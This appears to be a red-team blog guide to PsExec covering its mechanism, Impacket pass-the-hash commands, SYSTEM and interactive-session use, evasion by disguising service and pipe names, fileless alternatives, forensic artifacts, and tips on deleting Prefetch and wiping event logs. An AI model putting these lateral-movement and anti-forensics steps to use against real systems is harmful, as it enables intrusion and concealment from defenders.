As a red teamer, robust Remote Code Execution (RCE) is one of our primary goals. While there are infinite ways to execute code (WMI, WinRM, DCOM), one tool has stood the test of time: PsExec.

Originally developed by Mark Russinovich for Sysinternals (now owned by Microsoft), PsExec is a legitimate administration tool. It is not malware. However, its capability to gain an interactive SYSTEM shell on a remote machine makes it a favorite for attackers and a nightmare for defenders.

In this guide, we will dissect PsExec. We won’t just run it; we will understand its anatomy, its noise, and the modern alternatives that might save your operation from getting burned.

1. Anatomy of an Execution: How PsExec Works

Understanding the mechanism is critical for understanding the detection. When you run psexec \\target cmd.exe, the following sequence occurs:

  1. Authentication: It connects to the target’s IPC$ (Inter-Process Communication) share via SMB (Port 445).
  2. Upload: It uploads a service executable (PSEXESVC.exe by default) to the ADMIN$ share (C:\Windows).
  3. Service Creation: It uses the Service Control Manager (SCM) to create and start a service named PSEXESVC.
  4. Named Pipe: The service creates a Named Pipe (\pipe\psexecsvc) for input/output redirection.
  5. Execution: The service spawns your command (cmd.exe) as a child process.
  6. Cleanup: Upon exit, it stops the service and (usually) deletes the binary.

The Fatal Flaw: Steps 2 and 3 involve disk writes and service creation. These are loud.

2. Advanced Offensive Usage

While the original tool is powerful, Red Teamers primarily use the Impacket implementation (psexec.py) because it supports NTLM hashes natively.

Impacket psexec.py and Pass-the-Hash

You don’t need the password if you have the hash.

1
2

# Syntax: domain/user@target -hashes LM:NT
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@10.10.1.5

Running as SYSTEM (-s)

By default, PsExec runs as the user you authenticated as. The -s flag elevates you to NT AUTHORITY\SYSTEM (in the official tool). Impacket defaults to SYSTEM because it runs as a service.

The Interactive GUI Session (-i)

If you want your payload to be visible on the user’s desktop (e.g., to pop a message box or run a GUI tool), you must use the -i flag with the correct Session ID (usually 1 or 2 for logged-in users).

1
2
3
4
5

# Query sessions first
qwinsta /server:10.10.1.5

# Inject into Session 2
psexec -i 2 -s \\10.10.1.5 "msg * System Maintenance in Progress"

3. Defense Evasion: Reducing the Noise

If you must use PsExec, do not use the defaults.

1. Rename the Service (-r)

The default service name PSEXESVC is flagged by almost every IDS/EDR in existence.

Sysinternals PsExec:

1

psexec -r "WinSystemHelper" \\target cmd.exe

Impacket PsExec: Currently, Impacket’s psexec.py uses a randomized service name (e.g., BvJk.exe) by default. While this avoids the static PSEXESVC string, a random 4-char executable appearing in C:\Windows and registering as a service is still a high-confidence indicator of compromise.

Pro-Tip: Modify the source code of psexec.py or use the -service-name flag (if available in your fork) to use a legitimate-sounding name like AdobeUpdateService.

2. File-less Alternatives (smbexec.py & wmiexec.py)

If you want the “feel” of PsExec without the binary drop, use Impacket’s smbexec.py or wmiexec.py.

  • smbexec.py: Instead of uploading a binary, it creates a service that runs cmd.exe /c command, redirects stdout to a temp file (%TEMP%), and reads the file back via SMB. No EXE dropped, but still creates a service.
  • wmiexec.py: Uses DCOM to spawn processes. Generally the stealthiest option as it creates no services at all, relying on WMI calls.

3. Named Pipe Evasion

Modern EDRs hook the Named Pipe creation. Tools like SharpNoPSExec or heavily modified versions of Impacket allow you to change the pipe name to something blending in, like \pipe\atsvc (Task Scheduler) or \pipe\winspool (Print Spooler).

4. Forensic Artifacts: The Trail of Breadcrumbs

If you use PsExec, the blue team will find you if they look.

  1. Event ID 7045/7036: “A new service was installed.”
  2. File System: The presence of PSEXESVC.exe in C:\Windows. Even if deleted, it leaves NTFS MFT entries and USN Journal records.
  3. Prefetch: PSEXESVC.EXE will have a Prefetch file created upon execution.
  4. Shimcache (AppCompatCache): Windows tracks binary execution here.
  5. Named Pipes: Network traffic analysis will show SMB traffic attempting to open \pipe\psexecsvc (or your custom name).
  6. EULA Key: HKCU\Software\Sysinternals\PsExec\EulaAccepted. If this key exists on a machine, PsExec was run from that machine.

Conclusion

PsExec is a powerful administrative tool that enables reliable, interactive remote command execution. However, its high visibility mechanism (binary upload + service creation) makes it a “Door Kicker” tool rather than a “Ninja” tool.

Use it when you need stability and privilege (SYSTEM). Avoid it when you need stealth.

Detailed knowledge of its artifacts allows you to clean up (delete the Prefetch, wipe the Event Log if you dare) or choose a better tool for the job.

Happy hacking!

References